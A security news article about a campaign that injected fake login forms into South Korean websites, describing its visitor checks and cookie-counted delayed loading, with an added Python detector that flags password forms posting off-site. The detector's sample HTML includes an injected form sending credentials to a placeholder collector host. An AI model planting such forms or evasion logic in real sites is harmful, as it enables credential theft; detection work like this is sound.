Security researchers have come across a waterholing campaign that has compromised four South Korean websites by injecting fake login forms to steal user credentials.
Making matters worse, one of the spoofed sites is one of South Korea’s most popular search engines.
The information entered into the fraudulent login screen is then sent to a collection server, although the collected data is not accurately recorded, which leads Trend Micro to believe this is simply a research and development stage that is setting up the environment for a larger scam.
The first compromised site was seen on March 14. The malware creates a profile of the visitor and, before loading the fake login screen, scans the HTTP Referer header string for keywords related to popular search engines and social media sites to confirm that the visitor is real. It then identifies the device and operating system. The malware remains in the background and does not load the spoofed login form until the user has visited the compromised site six times, which it tracks through a previously set cookie. The attackers also used Cloudflare to protect their domains and hide their real IP addresses.
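A defender-side check for the indicator described above, as an added example that is not Trend Micro's or the article's code: it parses a page and flags any form holding a password field whose action posts to a site other than the page's own. The sample HTML and the collector domain are constructed placeholders; because the campaign only serves the form on the sixth visit, the HTML fed in must come from a fetch that replays the visit-count cookie, not from a first crawl.

```python
# Added example (not Trend Micro's code): flag password forms whose action posts
# to a host outside the page's own site, the indicator of an injected
# credential-harvesting form described above. Sample HTML is constructed.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class _FormCollector(HTMLParser):
    """Record each <form>'s action and whether it contains a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []      # [{"action": str, "has_password": bool}, ...]
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur and (a.get("type") or "").lower() == "password":
            self._cur["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def _site(host):
    """Crude registrable-domain heuristic: last two labels (no public-suffix list)."""
    return ".".join((host or "").lower().split(".")[-2:])

def off_origin_login_forms(page_url, html):
    """Return resolved action URLs of password forms that post off the page's site."""
    p = _FormCollector()
    p.feed(html)
    page_site = _site(urlparse(page_url).hostname)
    flagged = []
    for f in p.forms:
        if f["has_password"]:
            target = urljoin(page_url, f["action"])   # "" or relative -> same page/site
            if _site(urlparse(target).hostname) != page_site:
                flagged.append(target)
    return flagged

# Constructed sample: same-site login form, injected form posting to a placeholder
# third-party collector, and a search form with no password field.
SAMPLE_URL = "https://www.example-portal.kr/news/article"
SAMPLE_HTML = """
<form action="/account/login" method="post"><input name="id"><input type="password" name="pw"></form>
<form action="https://collector.example.net/c" method="post"><input name="id"><input type="password" name="pw"></form>
<form action="https://search.example.org/q"><input name="q"></form>
"""
if __name__ == "__main__":
    print(off_origin_login_forms(SAMPLE_URL, SAMPLE_HTML))
```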
Trend Micro believes the attackers are Chinese based on the language used in the code.